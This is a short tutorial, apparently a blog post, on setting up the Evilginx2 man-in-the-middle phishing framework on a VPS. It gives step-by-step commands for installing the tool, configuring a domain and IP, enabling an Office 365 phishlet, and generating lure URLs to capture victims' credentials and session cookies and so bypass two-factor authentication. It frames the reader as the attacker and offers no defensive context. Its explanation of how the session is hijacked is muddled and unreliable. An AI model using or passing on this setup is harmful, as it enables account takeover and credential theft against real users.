Evilginx is a man-in-the-middle exploit platform that is used to phish passwords as well as session cookies, which may eventually be used to circumvent 2-factor authentication security.

Evilginx2 is considered a sophisticated tool because it can bypass two-factor authentication (2FA) and multi-factor authentication (MFA) mechanisms.

This is done by intercepting the user’s session after they have successfully logged in and then redirecting them to a fake page where their session is hijacked.

The framework may employ phishlets to mimic a website and deceive visitors into entering credentials, such as Office 365, Citrix, or Netflix.

Because it is open source, several phishlets are ready to use.


  • Domain Name
  • VPS – Debian 10
  • IP Address
sudo apt update
sudo apt install wget git make -y

Install Go

wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh

Install Evilginx

git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
sudo make install

Configuration Files

Start Evilginx2

sudo evilginx
Evilginx2 phishlets

How to Configure Evilginx

config domain <yourdomain>
config ip <yourIP>
blacklist unauth


Phishlets are pre-configured modules within Evilginx designed to mimic specific websites and facilitate phishing attacks.

They essentially act as templates for creating customized phishing pages that closely resemble legitimate websites like banks, social media platforms, or email providers.

phishlets hostname o365 <yourdomain>
phishlets enable o365


Evilginx lures are essentially pre-generated phishing links designed to mimic legitimate websites and trick victims into entering their credentials.

They act as bait, luring unsuspecting individuals into the our trap.

lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0

Evilginx offers a variety of pre-built phishlets targeting popular websites like Gmail, Facebook, and banking portals.

Additionally, we can create custom lures for more specific targets.